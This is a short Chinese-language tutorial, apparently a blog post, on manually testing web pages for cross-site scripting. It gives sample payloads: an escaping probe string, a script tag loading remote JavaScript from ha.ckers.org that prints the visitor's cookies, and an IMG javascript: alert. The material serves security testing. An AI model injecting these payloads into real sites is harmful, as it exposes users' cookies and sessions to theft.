xss漏洞测试总结(一)

XSS(cross site scipt) cheat是安全测试的最常见的漏洞。

它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常忽略其危害性。
当他与csrf攻击手法结合时,会变的很强大很可怕(个人意见)。

怎样测试XSS呢?推荐一个好的去处:http://ha.ckers.org/xss.html
常用的简单的手工测试方法:
1、是 输入数据 ( '';!--"<XSS>=&{()} ) 验证输出数据是否进行了 Html 转义 ( &#39;&#39;;!--&quot;&lt;XSS&gt;=&amp; )  这是检察网页是否做了html转义,来避免恶意脚本被执行

2、上述网站推荐的另一个方法,输入数据  <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>  ,检查是否有警告框弹出。
我们可以进去看下,http://ha.ckers.org/xss.js写了些什么js脚本。

document.write ( "This is remote text via xss.js located at ha.ckers.org " + document.cookie);
alert ( "This is remote text via xss.js located at ha.ckers.org " + document.cookie);

获取到客户端的cookie,然后打印出警告框,显示当前cookie。

可以看到,一旦该脚本被执行,风险就不可控了。

3、还有图片类也可能产生XSS,我们在图片头文件中这样写
<IMG SRC= "javascript:alert('XSS');">
用户一旦点击该图片,头文件中的js就被偷偷摸摸的执行了。allin就做过类似的测试来防范邮件中的图片XSS攻击。

除此之外,还有大小写敏感,是否带引号等考虑,再次推荐参考
http://ha.ckers.org/xss.html

你可能感兴趣的:(职场,xss,跨站脚本攻击,休闲,安全测试)